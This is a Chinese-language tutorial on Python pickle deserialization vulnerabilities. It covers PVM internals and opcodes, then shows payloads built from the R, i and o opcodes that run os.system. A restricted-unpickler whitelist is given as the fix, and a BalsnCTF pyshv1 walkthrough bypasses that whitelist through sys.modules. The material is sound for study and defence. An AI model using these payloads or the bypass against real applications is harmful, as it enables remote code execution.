Pickle反序列化漏洞

模块 pickle 实现了对一个 Python 对象结构的二进制序列化和反序列化。 "pickling" 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过程，而 "unpickling" 是相反的操作，会将（来自一个 binary file 或者 bytes-like object 的）字节流转化回一个对象层次结构。 pickling（和 unpickling）也被称为“序列化”, “编组” 1 或者 “平面化”。而为了避免混乱，此处采用术语 “封存 (pickling)” 和 “解封 (unpickling)”。

简介

pickle是python的一个模块，是一种栈语言。在介绍pickle之前，需要先了解一下PVM的概念。PVM是一个解释器，类似于Python解释器，但是只专门用于处理pickle模块的指令和数据。它可以气度pickle字节流，并根据其中的指令和数据来重建和恢复原始的Python对象。

PVM主要的组成部分有栈区（Stack）、指令分析器和标志区（memo）

1.指令分析器的作用
 
从头开始读取流中的操作码和参数，并对其进行处理,在在这个过程中改变 栈区 和 标志区，处理结束后到达栈顶，形成并返回反序列化的对象
 
2.栈区的作用
 
作为流数据处理过程中的暂存区，在不断的进出栈过程中完成对数据流的反序列化，并最终在栈上生成发序列化的结果
 
3.memo的作用

memo是一个用于存储已序列化对象的字典或哈希表。它用于避免对同一对象进行重复序列化。

当PVM遇到需要序列化对象的指令时，它会检查memo字典来查看对象是否已经被序列化过。如果对象已经在memo中存在，PVM将直接引用memo中的序列化结果，而不会重复对该对象进行序列化。这样可以节省时间和空间，避免重复序列化相同的对象。

Pickle(反)序列化

接口方法

pickle.dump(obj,file)
# 将打包好的对象OBJ写入文件中
pickle.dumps(obj)
# 将OBJ打包后的对象作为bytes类型直接返回
pickle.load(file,data)
# 从文件中读取字节流，将其反序列化为一个对象并返回
pickle.loads(data)
从data中读取二进制字节流，将其反序列化为一个对象并返回。

object.__reduce__()
__reduce__()方法在序列化的字符被反序列化为对象的时候调用(类似PHP的wakeup魔术方法)
__reduce__() 其实是 object类中的一个魔术方法，我们可以通过重写类的 object.__reduce__() 函数。
Python 要求该方法返回一个 字符串或者元组 。如果返回元组(callable, ([para1,para2...])[,...]) ，那么每当该类的对象被反序列化时，该 callable 就会被调用，参数为para1、para2 ... 后面再详细解释

demo

import pickle
import pickletools
class Person(): #类名
    def __init__(self):
        self.age=18 #属性
        self.name="Pickle"

p=Person()
opcode=pickle.dumps(p)
print(opcode)

pickletools.dis(opcode)

# b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x06Person\x94\x93\x94)\x81\x94}\x94(\x8c\x03age\x94K\x12\x8c\x04name\x94\x8c\x06Pickle\x94ub.'

可以使用pickletools工具将二进制代码转化为可读的操作码，解读如下

0: \x80 PROTO 4：指示使用pickle协议版本4。
2: \x95 FRAME 55：指示下一个操作码之前有55个字节的数据帧。
11: \x8c SHORT_BINUNICODE '__main__'：将字符串'main'序列化为短格式的二进制Unicode字符串。
21: \x94 MEMOIZE (as 0)：将前一个对象（'main'字符串）标记为索引0以备后续引用。
22: \x8c SHORT_BINUNICODE 'Person'：将字符串'Person'序列化为短格式的二进制Unicode字符串。
30: \x94 MEMOIZE (as 1)：将前一个对象（'Person'字符串）标记为索引1以备后续引用。
31: \x93 STACK_GLOBAL：将全局对象（__main__模块）推入堆栈。
32: \x94 MEMOIZE (as 2)：将前一个对象（全局对象）标记为索引2以备后续引用。
33: ) EMPTY_TUPLE：创建一个空元组。
34: \x81 NEWOBJ：根据堆栈顶部的类名（'Person'）创建一个新的对象。
35: \x94 MEMOIZE (as 3)：将前一个对象（新创建的Person对象）标记为索引3以备后续引用。
36: } EMPTY_DICT：创建一个空字典。
37: \x94 MEMOIZE (as 4)：将前一个对象（空字典）标记为索引4以备后续引用。
38: ( MARK：标记元组的开始。
39: \x8c SHORT_BINUNICODE 'age'：将字符串'age'序列化为短格式的二进制Unicode字符串。
44: \x94 MEMOIZE (as 5)：将前一个对象（'age'字符串）标记为索引5以备后续引用。
45: K BININT1 18：将整数18序列化为单字节的二进制整数。
47: \x8c SHORT_BINUNICODE 'name'：将字符串'name'序列化为短格式的二进制Unicode字符串。
53: \x94 MEMOIZE (as 6)：将前一个对象（'name'字符串）标记为索引6以备后续引用。
54: \x8c SHORT_BINUNICODE 'Pickle'：将字符串'Pickle'序列化为短格式的二进制Unicode字符串。
62: \x94 MEMOIZE (as 7)：将前一个对象（'Pickle'字符串）标记为索引7以备后续引用。
63: u SETITEMS (MARK at 38)：将字典项设置为先前创建的

指令集 opcode

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " &lt; 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build &amp; push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build &amp; push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from &lt; 256 bytes
LONG4          = b'\x8b'  # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " &lt; 256 bytes

# Protocol 4

SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length &lt; 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame

# Protocol 5

BYTEARRAY8       = b'\x96'  # push bytearray
NEXT_BUFFER      = b'\x97'  # push next out-of-band buffer
READONLY_BUFFER  = b'\x98'  # make top of stack readonly

漏洞成因

和几乎所有反序列化漏洞一样，未限制用户的输入导致恶意代码执行

漏洞利用

R指令

cos         =>  引入模块 os.
system      =>  引用 system, 并将其添加到 stack.
(S'whoami'  =>  把当前 stack 存到 metastack, 清空 stack, 再将 'whoami' 压入 stack.
t           =>  stack 中的值弹出并转为 tuple, 把 metastack 还原到 stack, 再将 tuple 压入 stack.
R           =>  system(*('whoami',)).
.           =>  结束并返回当前栈顶元素.

i指令

先获取一个全局函数，然后取一个全局函数，寻找栈中的上一个mark，并组合之间的数据为元组作为参数执行全局函数

(S'calc'
ios
system
.

o指令

寻找上一个MARK，以之间的第一个数据为callable（可调用函数），第二个到第n个数据为参数，执行该函数（或实例化一个对象）

(cos
system
S'calc'
o.

漏洞修复

引用先知文章

和其他的反序列化漏洞一样，永远不要相信用户的输入，确保 unpickle 的内容不会来自于不受信任的或者未经验证的来源的数据。

在这一点之外，我们还可以通过重写 Unpickler.find_class() 来限制全局变量：

import builtins
import io
import pickle

safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

    #重写了find_class方法
    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

opcode=b"cos\nsystem\n(S'echo hello world'\ntR."
restricted_loads(opcode)


###结果如下
Traceback (most recent call last):
...
_pickle.UnpicklingError: global 'os.system' is forbidden

以上例子通过重写Unpickler.find_class()方法，限制调用模块只能为builtins，且函数必须在白名单内，否则抛出异常。这种方式限制了调用的模块函数都在白名单之内，这就保证了Python在unpickle时的安全性。

CTF例题

BalsnCTF:pyshv1

# File: securePickle.py
import pickle, io

whitelist = []

# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        return pickle.Unpickler.find_class(self, module, name)

def loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

dumps = pickle.dumps


# File: server.py
import securePickle as pickle
import codecs

pickle.whitelist.append('sys')

class Pysh(object):
    def __init__(self):
        self.login()
        self.cmds = {}

    def login(self):
        user = input().encode('ascii')
        user = codecs.decode(user, 'base64')
        user = pickle.loads(user)
        raise NotImplementedError("Not Implemented QAQ")

    def run(self):
        while True:
            req = input('$ ')
            func = self.cmds.get(req, None)
            if func is None:
                print('pysh: ' + req + ': command not found')
            else:
                func()

if __name__ == '__main__':
    pysh = Pysh()
    pysh.run()

重写了find_class(),对能引用的模块做了白名单限制，只能使用导入sys模块，并且也限制“.”，意味着不能使用子模块。

绕过的方式是，将不同的模块对象覆盖掉sys.modules['sys']，然后就可以调用不同的模块对象了

pker代码

modules = GLOBAL('sys', 'modules')
modules['sys'] = modules
module_get = GLOBAL('sys', 'get')
os = module_get('os')
modules['sys'] = os
system = GLOBAL('sys', 'system')
system('whoami')
return

526互联

Pickle反序列化漏洞学习